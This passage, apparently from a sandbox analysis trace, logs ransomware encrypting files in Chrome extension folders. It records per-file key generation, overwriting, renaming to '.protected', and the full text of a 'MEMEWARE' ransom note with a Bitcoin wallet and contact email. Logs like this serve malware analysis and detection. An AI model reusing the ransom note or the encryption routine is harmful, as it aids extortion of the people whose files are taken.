Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*") returned 143 [0079.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.051] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.051] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.051] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.051] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.051] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.051] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\.") returned 143 [0079.051] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.051] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.051] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.051] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.051] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.051] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.051] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\..") returned 144 [0079.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.051] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.051] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.051] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.051] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.052] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.052] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.052] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json") 
returned 155 [0079.052] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.052] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.052] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.052] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0079.052] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0079.052] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0079.052] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.052] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.053] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.053] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.053] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.053] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.053] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.053] CloseHandle (hObject=0x168) returned 1 [0079.055] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.protected") returned 165 [0079.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.protected")) returned 1 [0079.055] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.055] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.055] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\RESTORE_FILES.txt") returned 159 [0079.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.055] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.055] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.056] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.056] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.056] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.056] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.056] CloseHandle (hObject=0x164) returned 1 [0079.056] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.056] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0079.056] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0079.056] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0079.056] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0079.057] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0079.057] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR") returned 144 [0079.057] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0079.057] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0079.057] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*") returned 146 [0079.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.057] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.057] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.057] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.057] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.057] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.057] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\.") returned 146 [0079.057] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.057] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.057] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.057] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.057] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.057] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.057] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.057] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\..") returned 147 [0079.057] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.057] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.057] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.057] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0079.057] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.057] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.057] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.057] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.057] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0079.057] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.057] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.057] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.058] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0079.058] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0079.058] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0079.058] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.058] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.059] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.059] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.059] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.059] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.060] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.060] CloseHandle (hObject=0x168) returned 1 [0079.060] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.protected") returned 168 [0079.060] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0079.060] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.060] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.060] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 162 [0079.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.061] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.061] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.061] lstrlenA (lpString="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") returned 684 [0079.061] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.062] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.062] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.062] CloseHandle (hObject=0x164) returned 1 [0079.062] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.062] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0079.062] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0079.062] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0079.062] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0079.062] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0079.062] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT") returned 144 [0079.062] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0079.062] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0079.062] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*") returned 146 [0079.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.062] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.062] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.062] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.062] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.062] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.062] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\.") returned 146 [0079.062] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.062] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.063] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.063] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.063] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.063] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.063] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.063] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 